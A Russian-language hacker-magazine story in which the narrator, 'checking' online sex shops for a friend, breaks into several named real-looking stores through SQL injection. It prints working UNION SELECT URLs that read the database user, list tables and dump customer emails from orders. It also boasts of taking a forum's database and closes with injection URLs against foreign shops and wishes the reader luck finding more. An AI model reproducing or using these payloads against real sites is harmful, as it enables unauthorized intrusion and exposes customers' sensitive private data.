По правде говоря, я всегда опасался совершать покупки на свое имя в
Интернет-магазинах, и тому была своя причина. И проблема была даже не в том, что
я боялся засветить данные своих кредиток, которых у меня отродясь никогда и не
было, в отличие от массы чужих. В моем случае предубеждение основывалось на моих
собственных «тараканах в голове», зачатых и рожденных в бессонные ночи ковыряния
в различных торговых тележках и извлечения из оных баз с заманчивым содержимым.

Но в последнее время развитие электронной коммерции достигло уже такого
уровня, что гораздо проще и легче стало заказывать товар через различные
Интернет-шопы, чем искать его по магазинам. И вот тут то как раз и возникла
проблема между удобством с одной стороны и желанием во что бы то ни стало
защитить свои личные данные с другой. И об этом наш рассказ.

На днях ко мне с просьбой зашел друг детства, с которым мы до сих пор
поддерживаем приятельские отношения. У него с подружкой скоро должен был
наступить год их совместной жизни и он хотел сделать ей сюрприз, купив набор
садо-мазо атрибутики, но, к сожалению, местный секс-шоп кроме плетки и
наручников китайского производства ничего предложить не смог. Зная, что я имею
«небольшой бизнес» (пусть он так и считает) в Интернете, он обратился ко мне с
просьбой помочь ему выбрать и, самое главное, заказать товар.

Придя ко мне вечером с пивом, он сообщил, что пройдясь по секс-шопам рунета
он присмотрел несколько садо-мазо наборов, но пока окончательно не выбрал и
хотел бы посоветоваться со мной. А самое главное, его интересовало можно ли
доверять Интернет-магазинам. Я, отпив пива, отправился смотреть отобранные
приятелем магазины, чтобы на основании контента и схем оплаты отличить кидал от
честных предпринимателей.

Первым в списке был http://sexshop-online.ru, садо-мазо на нем было
представлено слабо, зато внешний вид и условия оплаты позволяли заключить, что
хозяйн шопа скорее всего не кинет. Через минуту я обнаружил SQL-инъекцию в этом
секс-шопе:

http://sexshop-online.ru/info.php?ID=1511+union+select+1,2,3,4,
user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*

MySQL оказалась пятой ветки, так что через несколько минут у меня был полный
список таблиц шопа:

http://sexshop-online.ru/info.php?ID=1511+union+select+1,2,3,4,5,6,7,table_name,
9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
+from+information_schema.tables+limit+66,1/*

И вот мы с приятелем дружно просматриваем внушительный список клиентов (я
привожу только мыло, остальные поля подберете сами если посчитаете нужным):

http://sexshop-online.ru/info.php?ID=1511+union+select+1,2,3,4,5,6,7,
email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+orders/*

Это утвердило меня в мысли, что этот шоп товар вышлет точно. (Я отписал
админу о баге, но она жива и по сей день. Админы читайте почту!) Походив еще
немного по базе и забрав себе в качестве бонуса базу форума sexzone.ru (в
настоящее время форум недоступен, чего не скажешь о его базе), мы отправились по
другим урлам.

Следующий секс-шоп оказался не лучше предыдущего, инжектящиеся скрипты и
пятая версия MySQL отдались в наши белые руки без боя:

http://www.sexashop.ru/goods/?id=5427+union+select+1,2,3,4,
table_name,6,7,8,9,10,11,12,13+from+information_schema.tables+limit+32,1/*

Просмотрев список клиентов, мы пошли дальше. Как оказалось, веселье было
только в самом разгаре.

Еще один секс-шоп http://stripshop.ru оказался, чуть ли не братом близнецом
предыдущих:

http://stripshop.ru/cat.php?id=-1+union+select+user()/*
http://stripshop.ru/cat.php?id=-1+union+select+table_name+from+information_schema.tables+limit+32,1/*

Пробежавшись по базе, мы отправились к следующему - http://internetsexshop.ru.
Убогий дизайн и попытка админа спрятать строку браузера при выводе подробной
информации о товаре не смогли скрыть от меня бажный скрипт:

http://internetsexshop.ru/information/?id=4477+union+select+1,2,3,user(),5,67,8,9,10,11,12,13,14/*

И только последний секс-шоп, http://intimka.ru/, оказался без явных багов, да
и не искали мы уже их особенно на нем. К тому же пиво уже подходило к концу.
Итогом всего этого секс-шоп тура стало то, что мой приятель махнул на свою затею
отовариться в Интернет-магазине и ушел домой. Напоследок сказав несколько
крепких слов об админах таких шопов, которые продвигают свой бизнес уверяя
клиентов в полной анонимности покупок в Интернете. Помниться с появлением СОРМ2
в Инете ходила шутка: «Завтра над вашей любовной перепиской будет плакать все
ФСБ». Так вот, с такими горе-админами секс-шопов, вообще не заботящимися о
безопасности, стоит придумать новый слоган: «Купи себе у нас в Интернет-магазине
анальный вибратор, и завтра о твоем увлечении будут знать все соседи!».

Вот поэтому я никогда и ничего не покупаю себе в Интернете, ну кроме
лицензионного софта от некоторых кодеров, скрывающихся за подозрительными никами
и еще свежих носков ;-).

З.Ы. Кстати, уязвимы не только российские секс-шопы, но и довольно большое
количество буржуйских, от таких убогих как:

http://www.dvdplusron.net/CatalogITEM.asp?strType=P&intCode=1%20or%201=@@version--

до таких серьезных и прибыльных как:

http://shop.private.com/shop/custsear.asp?catalog_name=MOD_US&searchtype =modelnumber&searchtext=-1%20or%201=@@version--

так что успеха тебе в поиске…

Check Also

Похоже, кто-то захватил ботнет Phorpiex и саботирует его работу

Аналитики Check Point заметили, что нечто странное происходит с ботнетом Phorpiex (Trik). …

Оставить мнение